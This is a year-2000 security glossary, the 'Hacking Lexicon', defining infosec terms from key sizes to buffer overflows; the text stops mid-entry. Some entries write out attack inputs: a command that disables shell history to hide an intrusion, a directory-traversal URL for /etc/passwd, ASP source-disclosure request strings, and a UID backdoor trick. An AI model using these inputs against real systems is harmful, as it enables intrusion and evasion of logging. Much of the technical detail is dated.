Hacking Lexicon

This document clarifies many of the terms used within the context of information security (infosec). My goal is not to define/explain terms, but clarify key points and dispell misconceptions.

Source: http://www.robertgraham.com/pubs/hacking-dict.html
Version 0.3.0, June 22, 2000
Disclaimer: This document has many ommisions and contains much that is apocryphal, or at least wildly inaccurate. This document does not define terms, but only clarifies what many people mean/imply when they use these terms in the context of information security. Feedback: Please send feedback to "hacking-dict@robertgraham.com". Tips: If you are trying to learn the lingo, I've tried to rate terms [1-5]; level one terms should be understood by beginners, level 4/5 terms are for experts who have no other life.

Copyright 1998-2000 by Robert Graham (hacking-dict@robertgraham.com. All rights reserved. This document may be reproduced only for non-commercial purposes. All reproductions must contain this exact copyright notice. Reproductions must not contain alterations except by permision.

[ 0 | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z ] .

- 0 -

128-bit [1]

Generally refers to strong (unbreakable) encryption. Web-browsers contain an option for 40-bit vs. 128-bit encryption. The United States only allows export of the weaker version in order to allow the government to spy on foreigners, especially during times of war (Author's note: my grandfather worked with the codebreakers in WWII -- it had a major impact indeed on winning the war). However, the U.S. export restrictions can easily be easily be bypassed, allowing many foreigners access to products with 128-bit encryption (example: https://www.ccc.de). Likewise, it has stiffled developement within the United States of products that need encryption, such as IEEE 802.11 wireless Ethernet.

Key point: The debate over strong encryption is never ending. Within the United States, law enforcement is constantly lobbying to restrict the use of strong encryption. Many resist, pointing out how often law enforcement already abuses wiretap powers (such as against Martin Luther King). At the same time, companies making products constantly lobby for the easing of export restrictions, so that they can sell strong encryption products abroad. Another funny thing is that the U.S. government's intransigence on this issue has actually led to stronger encryption abroad. U.S. export restrictions (and desire to spy on foreigners) was one of the reasons France relaxed its own law-enforcement bans on encryption use by citizens.

Key point: The random number generators within systems are often weaker than the key itself. For example, when you connect via SSL from your browser to a webserver, they choose a key for that session. That key is chosen with a random number generator. One estimate was that the average 128-bit session key contains only 47-bits of randomness. Other browsers have had even weaker systems allowing the session key to be recovered in only a few minutes.

40-bit [1]

The term "40-bit encryption" refers to the U.S. encryption export laws (note: in January, 2000, the U.S. upped the maximum size to 64-bits. The U.S. restricts the export of "strong encryption" technology. Products that include 40-bit encryption or less can freely be exported. Therefore, products like web browsers, wireless communications, DVD keys, etc. all use 40-bit encryption.

Key point: Specialized hardware can decrypt 40-bit keys in real time. The average new desktop has enough horsepower to decrypt 40-bit messages. Thus, many people now consider 40-bit encryption to be simply obfuscated plaintext.

Key point: 40-bit often refers to the RC4 system within browsers.

56-bit [1]

56-bit encryption contains 16-more bits than 40-bit encryption, and is therefore 65536 times more difficult to crack. On the other hand, it is likewise 256 times easier to crack than than 64-bit encryption.

Key point: In January of 1999, the EFF built a custom machine (the "Deep Crack") for $250,000 that could decrypt 56-bit DES encrypted messages in hours.

Key point: 56-bit cryptography almost always refers to DES.

64-bit [1]

In January of 2000, the U.S. government eased its export regulations of encryption 40-bit to 64-bit keys. Presumably, the government would only do so if the NSA had the capability of decrypting 64-bit encrypted messages. It is interesting to note that distributed.net's RC5-64 challenge cracking team of 100,000 computers working for about 2.5 years had managed only to check about 18% of the keyspace. This implies that the NSA has extremely hefty software.

8-character password [4]

Some systems, like Win9x and Solaris, limit the user to 8 characters in the password.

Key point: Security conscious users of such systems need to make sure they use a more random mix of characters because they cannot create long passwords.

Key point: Password cracking such systems is a little easier.

~user [3]

On UNIX, a home directory can be referenced by using a tilde (~) followed by their login name. For example, "ls ~rob" on my computer will list all the files in "/home/rob".

Key point: Web-servers often allow access to user's directories this way. An example would be http://www.robertgraham.com/~rob.

Key point: A big hole on the Internet is that people unexpectedly open up information. For example, the file .bash_history is a hidden file in a person's directory that contains the complete text of all commands they've entered into the shell (assuming their shell is "bash", which is the most popular one on Linux).

/dev/null [1]

On UNIX, this is a virtual-file that can be written to. Data written to this file gets discarded. It is similar to the file call NUL on Windows machines.

Key point: When rooting a machine, hackers will often redirect logging to /dev/null For example, the command ln -s /dev/null .bash_history will cause the system to stop logging bash commands.

Culture: In the vernacular, means much the same thing as "black hole". Typical usage, "if you don't like what I have to say, please direct your comments to /dev/null".

/etc [1]

The directory on UNIX where the majority of the configuration information is kept. It is roughly analogous to the Windows registry. Of particular interest is /etc/passwd file that stores all the passwords.

Key point: If a hacker can read files from this directory, then they can likely use the information to attack the machine.

/etc/hosts [1]

The file that contains a list of hostname to IP address mappings. In the old days of the Internet, this is how machines contacted each other. A master hosts file was maitained and downloaded to machines on a regular basis. Then DNS came along. Like the vestigal appendix. On Windows, this file is stored in %SystemRoot%\system32\drivers\etc.

Hack: If you can write files to a user's machine, then you can add entries to his/her hosts files to point to your own machine instead. For example, put an entry for www.microsoft.com to point to your machine, then proxy all the connections for the user. This will allow you to perform a man in the middle attack.

/etc/passwd [1]

The UNIX file that contains the account information, such as username, password, login directory, and default shell. All normal users on the system can read this file.

Key point: The passwords are encrypted, so even though everyone can read the file, it doesn't automatically guarantee access to the system. However, programs like crack are very effective at decrypting the passwords. On any system with many accounts, there is a good chance the hacker will be able to crack some of the accounts if they get hold of this file.

Key point: Modern UNIX systems allow for "shadowed" password files, stored in locations like /etc/shadow that only root root has access to. The normal password file still exists, minus the password information. This provides backwards compatibility for programs that still must access the password file for account information, but which have no interest in the passwords themselves.

Key point: The chief goal of most hacks against UNIX systems is to retrieve the password file. Many attacks do not compromise the machine directly, but are able to read files from the machine, such as this file. Typical examples include:

TFTP: Typical exploit asks for the filename "/etc/passwd". Some systems are misconfigured so that this works.
FTP: Similar to TFTP above, simply asking for the file can get it. Directory climbing sometimes works. Sometimes a shell can be exploited to reveal the file.
HTTP: Many custom web-servers (such as built-in ones used for remote management) contain directory climbing bugs that can be used to retrieve the file. Example: http://www.robertgraham.com/../../../etc/passwd.
/cgi-bin: A huge number of CGI scripts contain bugs that can be exploited to read files from the system. These include directory climbing vulnerabilities, shell vulnerabilities, as well as other stupid mistakes.

Key point: /etc/passwd is a simple text file, with one line per account. The line is broken down into seven columns:

account: The username. Note that a lot of systems ship with well-known names in their default passwd file.
password: An encrypted form of the user's password. Since they are encrypted, they are viewable by anybody who has access to the system. However, since users often choose weak passwords, hackers will often run crack programs that can decrypt the weak passwords. For this reason, admins often create a shadow password file that contains the real passwords, in which case this field will simply contain a "*".
UID: The user identifier, a unique number like "500" that identifies the user. Internally within the system, all users are referenced by their number rather than their name. One way to put a backdoor into the system is to place a string like "x500" rather than "500" in this field. This causes programs who read the file to parse this as the number "0", which is the UID for root.
GID: A primary group the user belongs to. The user can belong to secondary groups as configured in /etc/group.
GECOS: Some additional information about the account. For real users, this is often their full human readable name. For other pseudo-accounts, this may be some parameters.
directory: The user's home directory.
shell: The login shell that will be given to the user when they logon.

/etc/services [3]

On UNIX, the configuration file /etc/services maps port numbers to named services.

Key point: Its role in life is so that programs can do a getportbyname() sockets call in their code in order to get what port they should use. For example, a POP3 email daemon would do a getportbyname("pop3") in order to retrieve the number 110 that pop3 runs at. The idea is that if all POP3 daemons use getportbyname(), then no matter what POP3 daemon you run, you can always reconfigure its port number by editing /etc/services.

Misunderstanding: This file is bad in order to figure out what port numbers mean. If you want to find out what ports programs are using, you should instead use the program lsof to find out exactly which ports are bound to which processes. If running lsof is not appropriate, then you should lookup the ports in a more generic reference.

- A -

Access Control List [3]

Controlling access not only the system in general, but also resources within the system. For example, firewalls can be configured to allow access to different portions of the network for different users. Likewise, even after you log onto a file server, the server may still block access to certain files.

Key point: An Access Control List (ACL) is used to list those accounts that have access to the resource that the list applies to. When talking about firewalls, the ACL implies the list of IP addresses that have access to which ports and systems through the firewall. When talking about WinNT, the ACL implies the list of users that can access a specific file or directory on NTFS.

Contrast: Discretionary Access Control is the ability to have fine grained control over who has access to what resources.

ActiveX [1]

A type of mobile code whereby Microsoft's web browsers can automatically download executables to provide active content within web pages.

Contrast: ActiveX is similar to Java applets, except that the code is not "sandboxed": it has full access to the operating system. In order to stop hostile code, ActiveX relies upon digital signatures and "zones". Microsoft browsers are configured to trust ActiveX programs from servers in the "trusted" zone, to trust signed ActiveX programs from servers in less trusted zones, and to prompt/deny unsigned ActiveX applets from untrusted zones.

Controversy: The idea of trusted zones and signed applets works pretty well in theory, but doesn't always work well in practice. The problem is that is relies upon on all users making the correct choices all the time. The Melissa virus/worm proved that this philosophy is not adequate.

algorithm [1]

A series of steps specifying which actions to take in which order. This general term in the security field generally refers to an encryption or algorithm.

Analogy: An cookbook recipe is an algorithm.

Key point: Different algorithms have different levels of complexity. For example, consider the ancient parable (Babylonian?) about a king and a wise subject who did a favor for him. The subject asked for one piece of grain to be placed on the first square of a chess board, two grains on the second, four grains on the third, and so on, doubling the amount of grain for each successive square.

This problem demonstrates an algorithm of exponential complexity. For the first 10 squares of the chess board, the series is: 1 2 4 8 16 32 64 128 256 512. Thus, for the first 10 squares, roughly a thousand grains must be paid out. However, the series continues (using K=1024): 1k 2k 4k 8k 32k 64k 128k 256k 512k. Thus, for the first 20 squares, roughly a million grains must be paid out. After 30 squares, roughly a billion grains must be paid out. For 40 squares, roughly a trillion grains must be paid out.

This is directly related to such things as key size. A 41-bit key is twice as hard to crack as a 40-bit key. A 50-bit key is a thousand times harder. A 60-bit key is a million times harder. This is why the 128-bit vs. 40-bit encryption debate is so important: 128-bit keys are a trillion trillion times harder to crack (via brute force) than 40-bit keys.

Key point: Most algorithms are public, meaning that somebody trying to decrypt your message knows all the details of the algorithm. Consequently, the message is protected solely by the key. Many people try to add additional protection by making the details of the algorithm secret as well. Experience so far has led to the belief that this actually leads to weaker security for two reasons. First, such secrets always get discovered eventually, so if security depends upon this secret, it will eventually be broken. Secondly, human intelligence is such that someone cannot create a secure algorithm on his/her own. Therefore, only by working with a community of experts over many years can humans create a secure algorithm. To date, only two such communities exist: the entire world of cryptography experts publishing the details of their work and trying to break other people's work, and the tightly knit community of cryptography experts working in secret for the NSA.

ANI (Automated Number Identification)[3] (U.S.) In telephones, ANI identifies the caller to the recipient. In most cases, ANI cannot be blocked, such as when dialing 800 lines. Consumer caller-ID is essentially based upon ANI functionality. (Consumers can prevent caller-ID from working so that other consumers don't receive it, but they cannot block ANI when dialing 800 lines).

anonymous [2] .

Anonymity is one of the "holy grails" of hacking.

Key point: Anonymous e-mail services like Hotmail put the IP address of the person sending the e-mail in the headers (which are normally hidden from view by e-mail clients). Many would-be hackers get caught this way.

ASP (Active Server Pages)[3]

The server-side scripting language for Microsoft IIS web server.

Key point: A recurring bug in ASP has allowed hackers to read the script rather than the output of the script. These techniques rely upon changing the name of the script such that the server not longer recognizes it as a script, but as a file instead. Some techniques that have worked in the past have been:

/default.asp.: The file system automatically strips trailing dots because of the way Windows hides/appends file extensions.
/default.asp%2E: Same bug as above. Microsoft released a patch whereby the webserver checks for the appended dot. However, url-encoding the dot bypasses this quick fix.
/default.asp::$DATA: In order to support Macintoshes and other features, NTFS supports a feature known as alternate datastreams. The well-known stream called "::$DATA" references the original
/default.asp%8129: Far east editions will expose the source when a Unicode character is appended.

ARP [3]

ARP is a protocol used with TCP/IP to resolve addresses. The TCP/IP stack used to transmit data across the Internet is independent from the Ethernet used to shuttle data between local machines. Thus, when when machine needs to send an IP packet to a nearby machine, it broadcasts the IP address on the local Ethernet asking for the corresponding Ethernet address. The machine who owns the address responds, at which point the IP packet in question is sent to that Ethernet address.

Key point: By sniffing ARP packets off the wire, you can discover a lot of stuff going on. This is especially true of cable-modem and DSL segments. Since ARP packets are broadcasts, you aren't technically breaking your user's agreement by sniffing.

Key point: You can spoof ARP requests and/or responses in order to redirect traffic through your machine.

attack [1]

In security, the word attack has taken on very specific connotations. For example, you might here of researchers trying to "attack a cryptosystem". The word is often used in the abstract sense rather than in any physical sense. This academic circles, this word is often used in preference to other synonyms such as crack or break.

Example: Some classifications of attacks are:

passive vs. active attacks: A passive attack (like sniffer) is one that can take place by eavedropping. An active attack is one that requires interaction, such as injecting something into the data stream or altering data. All attacks are divided into these two categories. Note that active attacks can in theory be detected, while passive attacks cannot be.
hit and run vs. persistent attacks: A ping of death is a hit and run attack because it quickly crashes a machine. A smurf attack is persistent because the victim is affected only as long as the smurf lasts. As soon as the attacker stops smurfing, the victim's link becomes active again.
replay attack: An active attacker where you try to capture parts of a message then resend it at a later date, often with slight alterations. For example, on older Windows LAN Manager protocols, a hash of the password is sent. Therefore, anybody could right their own SMB protocol stack and replay the hash in order to break into the system.
brute force attack: Tirelessly tries all combinations until they can break in.
man in the middle attack: Either eavesdrops on an existing connection, or interposes himself in the middle of a connection changing data.
hijack: Takes over one side of an existing connection.
sniffing/wiretap/eavesdropping: A passive attack consisting of eavesdropping on a network connection.
rewrite: An attack that alters an encrypted message without first decrypting it. Block-ciphers

authentication [3]

In cryptography, authentication is the method used to verify something is what is claims to be. The antonym of authentication is forgery.

Example: When you log in with your username and give the password, you are authenticating yourself to the system. You are proving that you are you because, in theory, only you know your password.

Key point: Abstractly, anything that combats forgery is called authentication. For example, IPsec includes an Authentication Header (AH) that proves that a packet hasn't been modified in transit.

Contrast: Note that there is a small difference between authentication and authorization. In one case, once you authenticate somebody's identity, your next step is to figure out if they are authorized to do what they are asking to do (i.e. log onto the server). In other cases, authorization is independent from authentication, such as not allowing anybody to logon after midnight.

Examples:

biometrics: Signature (handwriting), facial features, fingerprint, etc.
smart-card
passwords
digital certificates

- B -

back channel [4]

Where the compromised system opens a connection back to the hacker.

Contrast: Remote administration trojans (RATs) are NOT examples of back channels, but are instead forward channels. A RAT allows the hacker to contact the system from anywhere in the world, and allows the hacker to hide where he/she is coming from. A back channel, on the other hand, will contact the hacker, who must have a fixed IP address. This clearly fingers who the hacker is.

Key point: Typical back channel protocols are X Windows (xterm) and shells like Telnet. These programs are often built into the victim's system, so many attacks that can't otherwise compromise the system can still trigger a back channel that allows a remote shell.

See also: covert channel

back door [3] .

Something a hacker leaves behind on a system in order to be able to get back in at a later time.

Example:

A Y2K programmer comes into fix your banking code, but leaves behind something in the software that allows him to log into an ATM and withdraw lots of money.
Somebody walking by your computer notices that you are logged in with root/administrator privileges. She creates her own account that will allow her to get back into the system at a later date.
A hacker breaks into your UNIX machine and installs a what is known as a "rootkits": a series of programs and configuration errors that will allow the hacker back into the system. There are so many items in a rootkit that it is unlikely the owner of the system can clean the entire thing out.
When a hacker breaks into your system, he leaves behind a program that will allow him to log in with a special username/password.
A hacker sends you a Trojan that installs a backdoor when you run it.

Key point: Key featuers of backdoors are:

They try to evade traditinal "cleanup" methods. E.g. even if the administrator changes all the passwords, cleans the registry/config files, and removes all the suspect software, a good backdoor will still be live on the system.
They try to evade logging: if every incoming connection to the system is logged, there is a good chance the backdoor provides a way to log in without being logged.
They hide well. If you scan the system looking for suspect software, there is a good chance the backdoor has used techniques to hide from this scan.

Key point: Back doors are frequently programmed into systems either benignly or maliciously. Most computers shipped today allow BIOS passwords to be set that will prevent the booting of the computer without the administrator first typing the password. However, since many people lose their password, such BIOSes often have a back door passwords that allows the real password to be set. Similarly, a lot of remotely manageable network equipement (routers, switches, dialup banks, etc.) have backdoors for remote Telnet or SNMP. The frequency of such back doors is due to the fact that people are stupid, set passwords, forget them, then whine to customer support.

Key point: A backdoor can be added to any system. For example, when generating random session keys, a programmer may actually subvert the random number generator. Such subversion would then allow decrypting of the message by those who knew the specifics. This has already been done accidentally; some paranoids believe that some encryption products do this intentionally in order to get export approval of 128-bit products.

banner [3]

Many text-based protocols will issue text banners when you connect to the service. These can usually be used to fingerprint the os or service.

Key point: Many banners reveal the exact version of the product. Over time, exploits are found for specific versions of products. Therefore, the intruder can simply lookup the version numbers in a list to find which exploit will work on the system. In the examples below, the version numbers that reveal the service has known exploitable weaknesses are highlighted.

Example: The example below is a RedHat Linux box with most the default service enabled. The examples below show only the text-based services that show banners upon connection (in some cases, a little bit of input was provided in order to trigger the banners). Note that this is an older version of Linux; exploits exist for most these services that would allow a hacker to break into this box (most are buffer-overflow exploits).

Protocol Port Banner

FTP 21 220 rh5.robertgraham.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Sat Nov 1 03:08:32 EST 1997) ready.

ssh 22 SSH-2.0-2.1.0 SSH Secure Shell (non-commercial)

Telnet 23 Red Hat Linux release 5.0 (Hurricane) Kernel 2.0.31 on an i486 login:

SMTP 25 220 rh5.robertgraham.com ESMTP Sendmail 8.8.7/8.8.7; Mon, 29 Nov 1999 23:28:31 -0800

finger 79
Login Name Tty Idle Login Time Office Office Phone rob Robert David Graham p0 Nov 29 22:51 (gandalf) root root p1 Nov 29 23:34 (10.17.128.201:0.0)

HTTP 80 HTTP/1.0 200 OK Date: Tue, 30 Nov 1999 07:34:59 GMT Server: Apache/1.2.4 Last-Modified: Thu, 06 Nov 1997 18:20:06 GMT Accept-Ranges: bytes Content-Length: 1928 Content-Type: text/html

POP3 110 +OK POP3 rh5.robertgraham.com v4.39 server ready

identd 113 0 , 0 : ERROR : UNKNOWN-ERROR

IMAP4 143 * OK rh5.robertgraham.com IMAP4rev1 v10.190 server ready

lp 515 lpd: lp: Malformed from address

uucp 540 login:

Protocol	Port	Banner
FTP	21	`220 rh5.robertgraham.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Sat Nov 1 03:08:32 EST 1997) ready.`
ssh	22	`SSH-2.0-2.1.0 SSH Secure Shell (non-commercial)`
Telnet	23	`Red Hat Linux release 5.0 (Hurricane) Kernel 2.0.31 on an i486 login:`
SMTP	25	`220 rh5.robertgraham.com ESMTP Sendmail 8.8.7/8.8.7; Mon, 29 Nov 1999 23:28:31 -0800`
finger	79	Login Name Tty Idle Login Time Office Office Phone rob Robert David Graham p0 Nov 29 22:51 (gandalf) root root p1 Nov 29 23:34 (10.17.128.201:0.0)
HTTP	80	`HTTP/1.0 200 OK Date: Tue, 30 Nov 1999 07:34:59 GMT Server: Apache/1.2.4 Last-Modified: Thu, 06 Nov 1997 18:20:06 GMT Accept-Ranges: bytes Content-Length: 1928 Content-Type: text/html`
POP3	110	`+OK POP3 rh5.robertgraham.com v4.39 server ready`
identd	113	`0 , 0 : ERROR : UNKNOWN-ERROR`
IMAP4	143	`* OK rh5.robertgraham.com IMAP4rev1 v10.190 server ready`
lp	515	`lpd: lp: Malformed from address`
uucp	540	`login:`

Defenses: Many systems allow banners to be supressed. You shoul read the software documentation for more information on this.

BGP (Border Gateway Protocol)[3]

On the Internet, BGP is used between ISPs in order to communicate routers. For example, imagine that the ALICE ISP needs to reach the BOB ISP. However, ALICE is not directly connected to BOB. ALICE therefore must figure out which ISP should be used to send traffic to BOB. It is through the use of BGP that such information is discovered. The name "border" comes from the fact that ISPs use BGP only on their borders (in contrast, they would use some other protocol (like OSPF) inside their networks).

Key point: BGP can be subverted in numerous ways. BGP is generally unauthenticated, and rogue ISPs can play havoc.

biometrics [3]

In the field of authentication, biometrics is the method whereby a person is recognized according to personal traits, presumably ones they cannot alter. Typical examples are signatures we sign on documents and facial recognition that we use in everyday life.

Example: retina, iris, palm print, fingerprint, thumbprint, hand geometry, handwriting, signature, speech/voice, gait, typing characteristics, scent, facial features, DNA

Contrast: There are roughly three "factors" used in authentication

physical (what you have): car keys, subway tokens, driver's license, passport, credit cards, ID cards, smart cards
knowledge (what you know): PINs, usernames/passwords, account numbers
biometrics (who you are): signature, what you look like, etc.

Contrast: Biometrics is based upon your real identity (who you are). Most other authentication methods are based upon a virtual identity. Your username/password doesn't identify you, but your account on the computer. Similarly, root on a UNIX machine isn't a real person, but a role account.

Key Point: Biometrics has a number of problems. The first is that biometrics degrade over time. People's signatures change over time. An injury can change fingerprints. Voice recognition systems fail when people have cold. Thus, biometric systems fail quite often.

BIOS [3]

On your PC, the BIOS is the software the first runs when your computer starts up. All the messages you see when it starts up are from the BIOS program. Once it gets through testing memory and configuring your system, it then "boots" the operating system that you've installed on your hard-disk.

Key pont: The BIOS stores configuration settings in NVRAM (Non-Volatile RAM). Remember that the contents of your normal RAM/memory are lost when you power-off your computer. The contents of NVRAM, in contrast, are retained when power goes off. Most NVRAM consists of CMOS (low-power) chips with a small battery that constantly feeds power to the chips (such batteries last about 5-years). A common trick of hackers and viruses is to corrupt the CMOS settings causing the computer to fail to boot. Removing the battery connection (usually a jumper on the motherboard) will cause the CMOS settings to be lost and be reset back to default (good) state.

Key pont: All of today's BIOSes are stored in programmable ROMs, which allows them to be reprogrammed (usually with bug fixes from the manufacturer). This allows the hacker to reprogram them as well. While in theory the hacker could reprogram his/her own code into the BIOS, in practice this has not been done yet. Instead, hackers can sometimes use this programming feature to corrupt the BIOS code (in much the same way they corrupt the BIOS settings mentioned above). This will usually prevent the system from booting even to a point where a fresh BIOS can be re-programmed into the system. This requires that the system be brought back to the vendor in order to have the BIOS reprogrammed. Note that you can often set a jumper on the motherboard that denies the ability to reprogram the BIOS.

bit [1]

A numeric quantity with precisely two values, such as 0 and 1, false and true, up or down, and so forth.

Key pont: In many contexts, each additional bit means "twice as much". 8 extra bits means 256 times as much. 16 extra bits means 65536 times as much. Therefore, it takes 65536 times longer to brute force crack a 56-bit key than a 40-bit key.

bomb (logic bomb or mail bomb)[3]

The word bomb has two unrelated meanings: logic bombs and mail bombs.

In the class of hostile software, a logic bomb is some code left behind by a program that "goes off" at a particular time (such as deleting all the files on the computer on New Years Eve). One theory was that Y2K consultants left logic bombs inside the code they were fixing in order to earn even more money after Y2K.

A mail bomb is the effect of sending somebody tons of e-mail, overloading their mailbox and/or network connection. Sometimes this can be done with a program, other times it can be done simply by signing up the victim to huge numbers of e-mailing lists. Finally, it can be accidental, as happened once to Apple Computer when its mailing list software got out of control.

History: In the old days of UNIX terminals, an e-mail message containing VT100 control codes in a logic bomb could completely hose a user's terminal, forcing them to log out. DOS machines supporting the ANSI.SYS driver also had that problem.

bootp (boot protocol)[1]

This relative ancient protocol facilitates booting devices ("clients") from a network server rather than their local hard-disks (such as diskless workstations). In this configuration, the bootp protocol configures the diskless device with its IP configuration information as well as the name of the file server. At this point, the client shifts to TFTP to download the actual files it will use to boot from.

Key point: DHCP is simply an extension on top of bootp. This is important because without an IP address, clients cannot reach bootp servers that reside across routers. Virtually all routers have an extension for bootp forwarding that fixes this issue. Since DHCP had the same requires, the designers just stuck it inside bootp packets rather than requiring yet another change to the routing infrastructure.

boot sector (boot record)[1]

The first sector on a driver where the operating system will bootstrap from.

Key point: Until macro viruses came along, boot sector viruses where the most common variant. They spread through companies via floppy disks. Users would leave floppy disks in the drive and when the computer restarted, it would attempt to boot from the floppy. This would run the virus, which then infected the boot sector on the hard drive. Any further floppies plugged into the system would then be infected by the virus.

Countermeasures: I worked at a company with anal anti-virus procedures (anti-virus on all desktops, regular wiping of floppy disks). It was never able to completely free itself from the boot sector virus problem; one of the viruses was never successfully eradicated from the company. My own personal policy is to disconnect the floppies on 90% of the machines, and disable floppy bootup on the remaining machines.

'bot [2]

Short for robot, a 'bot is an automated program that does something.

Example: A cancel-bot is a program that attempts to cancel lots of messages within USENET newsgroups. These are sometimes used by the USENET Death Penalty or rogue cancelers. *

Example: Search engine spiders that index the web follow web-page links, going from site to site, downloading web-pages.

Example: In the IRC wars, hackers run automated bots to control channels. These are programs (usually in C) that help in administering channels, protection against hackers, flooding, and so forth.

browser [1]

Key point: Netscape and Microsoft have not yet produced a browser that is hardened against predation from hostile websites.

Key point: Disabling Java, JavaScript, and ActiveX will lock out virtually all hacks against the browser. However, thist will also lock out many websites.

brute force [3]

A classic attack technique whereby all possible combinations are attempted until one succeeds. This typically refers to cryptography, either finding the right key to decrypt a message, or discoverying somebody's password.

Analogy: If you somehow steal somebody's ATM card, you could try to use it in a bank machine. PIN numbers are only 4 digits, meaning 10,000 possible combinations. If you were patient, you could stand at the cash machine trying all possible 10,000 combinations. (Of course, ATM machines will always eat the cards after a few unsuccessful tries in order to stop this).

Key point: The term brute force often means "the most difficult way". In the above example of the PIN number, you can always find the PIN number after guessing 10,000 combinations. But sometimes there are easier ways. For example, a bank may choose to assign PIN numbers based upon a combination of the issuing date and the user's name. Therefore, the problem is reduced to guessing when a card was issued, which may consist of only a few hundred guesses.

Therefore, any technique that is more difficult than brute force is pointless. Likewise, brute force is very difficult, so hackers continually search for techniques that are less difficult.

Key point: The possibility of doing brute-force key-space searches is often compared to the age of the universe, number of atoms in the planet earth, and the yearly output of the sun. For example, Bruce Schneier has calculated that according to what we know of quantum mechanics today, that the entire energy output of the sun is insufficient to break a 197-bit key.

buffer overflow (buffer overrun)[2] . . . . .

A classic exploit that sends more data than a programmer expects to receive. Buffer overflows are one of the most common programming errors, and the ones most likely to slip through quality assurance testing.

Analogy: Consider two popular bathroom sink designs. One design is a simple sink with a single drain. The other design includes a backup drain near the top of the sink. The first design is easy and often looks better, but suffers from the problem that if the drain is plugged and the water is left running, the sink will overflow all over the bathroom. The second design prevents the sink from overflowing, as the water level can never get past the top drain.

Example: In much the same way, programmers often forget to validate input. They (rightly) believe that a legal username is less than 32 characters long, and (wrongly) reserve more than enough memory for it, typically 200 characters. The assume that nobody will enter in a name longer than 200 characters, and don't verify this. Malicious hackers exploit this condition by purposely entering in user names a 1000 characters long.

Key point: This is a classic programming bug that afflicts almost all systems. The average system on the Internet is vulnerable to a well known buffer overflow attack. Many Windows NT servers have IIS services vulnerable to a buffer overflow in ".htr" handler, many Solaris servers have vulnerable RPC services like cmsd, ToolTalk, and statd; many Linux boxes have vulnerable IMAP4, POP3, or FTP services.

Key point: Programs written in C are most vulnerable, C++ is somewhat less vulnerable. Programs written in scripting level languages like VisualBasic and Java are generally not vulnerable. The reason is that C requires the programmer to check buffer lengths, but scripting languages generally make these checks whether the programmer wants them or not.

Key point: Buffer overflows are usually a Denial-of-Service in that they will crash/hang a service/system. The most interesting ones, however, can cause the system to execute code provided by the hacker as part of the exploit.

Defenses: There are a number of ways to avoid buffer-overflows in code:

Use programming languages like Java that bounds-check arrays for you.
Run code through special compilers that bounds-check for you.
Audit code manually
Audit code automatically

Key point: The NOOP (no operation) machine language instruction for x86 CPUs is 0x90. Buffer overflows often have long strings of these characters when attacking x86 computers (Windows, Linux).

Key point: In a successful buffer overflow exploit, the hacker forces the system to run his own code. Since most network services run as "root" or "administrator", the exploit would give complete control over the machine. For this reason, more and more services are being configured to run with lower priveliges.

- C -

C programing language [3] .

Key point: The language is quirky, difficult for beginners to learn, and really just an accident of history. Despite this, one must grok the language in order to become a true hacker.

Key point: The large number of buffer overflow exploits is directly related to poor way that C protects programmers from doing the wrong thing. On the other hand, these lack of protections leads directly to its high speed.

cache [3]

In general computer science, the word cache means simply to keep things around in case they are used again. For example, when you log onto your system, your username and password are stored in a cache in memory, because they are repeatedly used by the system everytime you access a resource.

Key point: Sometimes systems can be exploited through the cache. Examples are:

HTTP proxy servers: Companies use these so that thousands of users can share a single Internet connection. They store recently used webpages so that when multiple users access the same web-site, the proxy server only has to go across the link once in order to fetch the page for all the users. A never ending series of bugs leads to conditions whereby when one user logs into a website, other users can see that first user's data.
Web-browser history/file cache: Once a hacker breaks into a machine, he/she can view the history cache (list of URLs) or file cache (the actual contents of the web-sites) in order to spy on where the user has been. Embarassing, inadvertent disclosure of this information by users with certain surfing habits is common.
Web-browser cookie cache: Lots of web-sites store passwords within cookies, so that stealing somebodies cookie information will allow a hacker to log in as that user.

camping [2]

A hacking technique whereby the intruder monitors a range of ISP dialup lines. As soon as a user dialsup, the hacker is notified and automated attack scripts are run. For example, it may ping the range continuously, and as soon as a ping responds, a script is run that attempts to connect to File and Print Sharing and read files from the harddisk.

Key point: When dialing up to an ISP, the first 10 minutes are the most dangerous.

certificate [3]

In PKI, a certificate contains the public key of the owner, and is signed by a trust trusted CA.

Key point: Certificates can be revoked. This means that a company who believes that their site has been compromised can put up a server on the Internet that tells everyone else that the certificate is no longer valid.

Key point: The Verisign embedded certificates in older browsers (IE 3.0, Netscape 4.0) have expiration dates of January 1, 2000. This means that anybody using older browsers will get nasty warnings when they visit ecommerce sites or attempt to verify files with authenticode.

Certificate Authority (CA) [3]

A trusted authority who signs certificates.

Key point: The way it is supposed to work is that you have a certificate that claims to be Microsoft signed by Verisign (a popular CA), then you trust that Verisign has done a reasonable job both ensuring that Microsoft is who they say they are, and that Microsoft has done a reasonably good job protecting their private keys from theft.

Contrast: Microsoft could create a "self-signed" certificate, but then anybody else could create a self-signed certificate claiming to be Microsoft. Therefore, you trust a CA-signed certificate more than a self-signed certificate, as long as you trust the CA.

Key point: How do you trust a CA? The answer is marketing. First, a company like Verisign has spent millions of dollars creating a reputable company that would be destroyed if a flaw was found in their process (i.e. thieves were able to steal their private keys). Second, Versign (and a few other CAs) have managed to embed their public keys within Internet Explorer and Netscape Navigator. This means that any website using SSL must obtain a certificate signed by one of these built-in CAs, or else users get confusing warning messages.

Humor: Microsoft uses certificates signed by Verisign, because it is trusted by many people. The reason so many people trust Verisign these days is because its root keys are included with Microsoft's browsers.

Key point: One of the chief RISKS is the theft of the private key used to sign things. If a hacker/thief is able to steal it, then they can masquarade as someone

Key point: Several important CA certificates (i.e. Verisign) expired on Dec. 31, 1999. Since it is feasable to eventually compromise a certificates, they usually expire at some date. The certificates for trusting root CAs that are built-in many browsers (Internet Explorer 4.0 and earlier, Netscape Navigator 4.06 and earlier) were created in 1995, and were made for a 5-year lifespan. One of the creators of these certificates now says he wished he'd put the expiration date a little off, such as on Dec. 15, in order to avoid the Y2K madness.

cgi-bin (CGI, Common Gateway Interface)[3] .

On webservers, CGI is a standard for creating dynamic content. When you request a document in the /cgi-bin directory, instead of sending you the document, the webserver passes your request to the named program/script. This program generates the requested document on the fly, usually based upon the contents of a backend database. The word "CGI" stands for "Common Gateway Interface", which generally confuses people more than help them.

chaining [4]

For block-ciphers, chaining the technique of combining the information from previous blocks into the encryption of the next block such that the same pattern in a message will not be encrypted the same way twice.

challenge [3]

A method to authenticate users that avoids sending passwords over the network. It goes something like this (though the details among various programs are different).

